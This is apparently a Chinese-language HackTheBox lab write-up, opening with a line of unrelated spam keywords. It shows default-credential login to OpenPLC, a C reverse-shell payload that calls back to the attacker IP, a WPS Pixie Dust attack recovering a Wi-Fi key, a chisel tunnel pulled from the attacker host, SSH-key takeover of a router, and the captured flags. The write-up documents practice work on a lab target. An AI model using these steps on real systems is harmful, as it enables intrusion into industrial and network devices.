免费发帖推广网站,加盟什么连锁最挣钱,重庆旅游攻略,商城网站建设大连目录
连接至HTB服务器并启动靶机
信息搜集
使用rustscan对靶机TCP端口进行开放扫描
使用nmap对靶机开放端口进行脚本、服务扫描
使用curl访问靶机8080端口
使用浏览器直接访问/login路径
漏洞利用
使用searchsploit搜索该WebAPP漏洞
Payload
USER_FLAG#xff1a;bb…目录
连接至HTB服务器并启动靶机
信息搜集
使用rustscan对靶机TCP端口进行开放扫描
使用nmap对靶机开放端口进行脚本、服务扫描
使用curl访问靶机8080端口
使用浏览器直接访问/login路径
漏洞利用
使用searchsploit搜索该WebAPP漏洞
Payload
USER_FLAGbb4486cda052880dad71c535b3fff1af
横向移动
对wlan0接口信息进行扫描
使用oneshot对路由AP进行PIN码PixieDust漏洞利用
通过该WPA配置文件进行连接
AP渗透
攻击机通过chisel开始反向连接
通过FoxyPorxy插件将代理端口设置成1080将协议切换至SOCKS5
特权提升
使用ssh-keygen生成密钥对
将proxychains4配置文件中的端口设置成1080
ROOT_FLAGe8ce76b1c0aa7b37bebc8bef041b6a93 连接至HTB服务器并启动靶机 靶机IP10.10.11.7 分配IP10.10.16.7 信息搜集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.11.7 -r 1-65535 --ulimit 5000 使用nmap对靶机开放端口进行脚本、服务扫描
nmap -p 22,8080 -sCV 10.10.11.7 使用curl访问靶机8080端口
curl -I http://10.10.11.7:8080 被重定向了尝试访问重定向后的URL
curl -I http://10.10.11.7:8080/login 使用浏览器直接访问/login路径 尝试到Google搜索该WebAPP默认凭证 账户openplc 密码openplc 使用默认凭证成功登录到网页后台 漏洞利用
使用searchsploit搜索该WebAPP漏洞
searchsploit OpenPLC 将该EXP拷贝到当前目录下
searchsploit -m 49803.py ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# searchsploit -m 49803.py Exploit: OpenPLC 3 - Remote Code Execution (Authenticated) URL: https://www.exploit-db.com/exploits/49803 Path: /usr/share/exploitdb/exploits/python/webapps/49803.py Codes: N/A Verified: False File Type: Python script, ASCII text executable, with very long lines (1794) Copied to: /home/kali/Desktop/temp/49803.py 尝试利用该EXP
python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# python 49803.py -u http://10.10.11.7:8080 -l openplc -p openplc -i 10.10.16.8 -r 1425 [] Remote Code Execution on OpenPLC_v3 WebServer [] Checking if host http://10.10.11.7:8080 is Up... [] Host Up! ... [] Trying to authenticate with credentials openplc:openplc [x] Login failed :( 试了很多个Github上的EXP、PoC都不行我决定手动利用该漏洞
Payload
#include ladder.h
#include stdio.h
#include sys/socket.h
#include netinet/in.h
#include arpa/inet.h
#include string.h
#include unistd.h#define IP 这里填写攻击机监听IP
#define PORT 这里填写攻击机监听端口int main()
{int sockfd socket(AF_INET, SOCK_STREAM, 0);struct sockaddr_in server_addr;server_addr.sin_family AF_INET;server_addr.sin_port htons(PORT);inet_pton(AF_INET, IP, (server_addr.sin_addr));connect(sockfd, (struct sockaddr *)server_addr, sizeof(server_addr));dup2(sockfd, 0);dup2(sockfd, 1);dup2(sockfd, 2);execve(/bin/sh, 0, 0);close(sockfd);return 0;
}左侧导航栏进入Hardware模块 首先往里写入Payload头部 将initCustomLayer函数内容进行填充 点击Save Change后回到面板 本地侧nc开始监听
nc -lvnp 1425
点击左下角的Start PLC本地侧nc将收到回显 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.16.8] from (UNKNOWN) [10.10.11.7] 59548 whoami root 提升TTY
script -c /bin/bash -q /dev/null
查找user_flag位置并查看其内容 rootattica01:/opt/PLC/OpenPLC_v3/webserver# find / -name user.txt find / -name user.txt find: /sys/kernel/debug: Permission denied /root/user.txt rootattica01:/opt/PLC/OpenPLC_v3/webserver# cat /root/user.txt cat /root/user.txt bb4486cda052880dad71c535b3fff1af USER_FLAGbb4486cda052880dad71c535b3fff1af 横向移动
列出所有网络接口
ifconfig 查看wlan0接口是否已链接WIFI
iw wlan0 link rootattica01:/proc/1# iw wlan0 link iw wlan0 link Not connected. 使用wlan0扫描靶机周边WIFI
iwlist wlan0 scan 扫描到WIFIplcrouter该网络使用WPA2加密方式
对wlan0接口信息进行扫描
iw wlan0 scan 由扫描可见该接口启用了WPS-1.0这意味着我们可以突破本机对其他网络的访问限制
使用oneshot对路由AP进行PIN码PixieDust漏洞利用
python3 oneshot.py -i wlan0 -K 新建一个WPA配置 rootattica01:/tmp# cat EOF wpa.conf cat EOF wpa.conf network{ network{ ssidplcrouter ssidplcrouter pskNoWWEDoKnowWhaTisReal123! pskNoWWEDoKnowWhaTisReal123! } } EOF EOF 查看该文件内容是否正常写入
cat wpa.conf rootattica01:/tmp# cat wpa.conf cat wpa.conf network{ ssidplcrouter pskNoWWEDoKnowWhaTisReal123! } 通过该WPA配置文件进行连接
wpa_supplicant -B -i wlan0 -c wpa.conf rootattica01:/tmp# wpa_supplicant -B -i wlan0 -c wpa.conf wpa_supplicant -B -i wlan0 -c wpa.conf Successfully initialized wpa_supplicant rfkill: Cannot open RFKILL control device rfkill: Cannot get wiphy information 再次查看wlan0连接状态
iw wlan0 link rootattica01:/tmp# iw wlan0 link iw wlan0 link Connected to 02:00:00:00:01:00 (on wlan0) SSID: plcrouter freq: 2412 RX: 12741 bytes (181 packets) TX: 1139 bytes (11 packets) signal: -30 dBm rx bitrate: 1.0 MBit/s tx bitrate: 54.0 MBit/s bss flags: short-slot-time dtim period: 2 beacon int: 100 查看该网口是否已分配ipv4地址
ifconfig wlan0 rootattica01:/tmp# ifconfig wlan0 ifconfig wlan0 wlan0: flags4163UP,BROADCAST,RUNNING,MULTICAST mtu 1500 inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20link ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet) RX packets 7 bytes 1223 (1.2 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 16 bytes 2172 (2.1 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 初始化DHCP池
dhclient
再次查看该网口信息发现已分配ipv4地址
ifconfig wlan0 rootattica01:/tmp# ifconfig wlan0 ifconfig wlan0 wlan0: flags4163UP,BROADCAST,RUNNING,MULTICAST mtu 1500 inet 192.168.1.84 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::ff:fe00:200 prefixlen 64 scopeid 0x20link ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet) RX packets 14 bytes 2444 (2.4 KB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 19 bytes 3252 (3.2 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 AP渗透
向AP路由发送ICMP包测试连通性
ping -c 3 192.168.1.1 rootattica01:/tmp# ping -c 3 192.168.1.1 ping -c 3 192.168.1.1 PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. 64 bytes from 192.168.1.1: icmp_seq1 ttl64 time0.066 ms 64 bytes from 192.168.1.1: icmp_seq2 ttl64 time0.101 ms 64 bytes from 192.168.1.1: icmp_seq3 ttl64 time0.093 ms --- 192.168.1.1 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2046ms rtt min/avg/max/mdev 0.066/0.086/0.101/0.015 ms 攻击机通过python开启http服务
python -m http.server 6666
靶机将chisel进行下载
curl -O 10.10.16.8:6666/chisel
攻击机通过chisel开始反向连接
./chisel server -p 8888 --reverse
靶机通过chisel客户端开始代理
./chisel client 10.10.16.8:8888 R:socks
本地chiseel服务端侧收到回显 ┌──(root㉿kali)-[/home/kali/Desktop/tool] └─# ./chisel server -p 8888 --reverse 2024/11/23 05:50:59 server: Reverse tunnelling enabled 2024/11/23 05:50:59 server: Fingerprint rk0ke7Ywur1ipavVlzy3deroS9dWpE5/nI1XkuXErk8 2024/11/23 05:50:59 server: Listening on http://0.0.0.0:8888 2024/11/23 05:56:13 server: session#1: tun: proxy#R:127.0.0.1:1080socks: Listening 通过FoxyPorxy插件将代理端口设置成1080将协议切换至SOCKS5 尝试直接访问192.168.1.1 直接空密码进入AP后台控制面板 特权提升
在System栏目下找到了Administration控制面板 此处允许我们为AP管理员添加一个SSH公钥文件
使用ssh-keygen生成密钥对
ssh-keygen ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# ssh-keygen Generating public/private ed25519 key pair. Enter file in which to save the key (/root/.ssh/id_ed25519): ./id_rsa Enter passphrase for ./id_rsa (empty for no passphrase): Enter same passphrase again: Your identification has been saved in ./id_rsa Your public key has been saved in ./id_rsa.pub The key fingerprint is: SHA256:EiG4sHRbvnftfKikT8F9p9QCsWApbR5AT1ymrNSmhUU rootkali The keys randomart image is: --[ED25519 256]-- | .. ooEo | |.... o oO* o | |.o.. .oB.o | |. .. ...*.. . . | | ooSo.. o | | . o ...o | | . .oo .. | | . | | ..o. . | ----[SHA256]----- 查看公钥文件内容
cat id_rsa.pub ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# ls id_rsa id_rsa.pub ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# cat id_rsa.pub ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIiRRJfHVmn5mdCvJwluUwdD1I5zYooqE5FpEVKoi rootkali ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICIiRRJfHVmn5mdCvJwluUwdD1I5zYooqE5FpEVKoi rootkali
将该公钥上传至该面板中 查看proxychains4配置端口
tail -n 5 /etc/proxychains4.conf ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# tail -n 5 /etc/proxychains4.conf [ProxyList] # add proxy here ... # meanwile # defaults set to tor socks5 127.0.0.1 1425 将proxychains4配置文件中的端口设置成1080 使用proxychains4代理后通过SSH服务登录到AP路由
proxychains4 ssh root192.168.1.1 -i id_rsa 在当前目录下找到了root_flag rootap:~# id uid0(root) gid0(root) rootap:~# ls root.txt rootap:~# cat root.txt e8ce76b1c0aa7b37bebc8bef041b6a93 ROOT_FLAGe8ce76b1c0aa7b37bebc8bef041b6a93
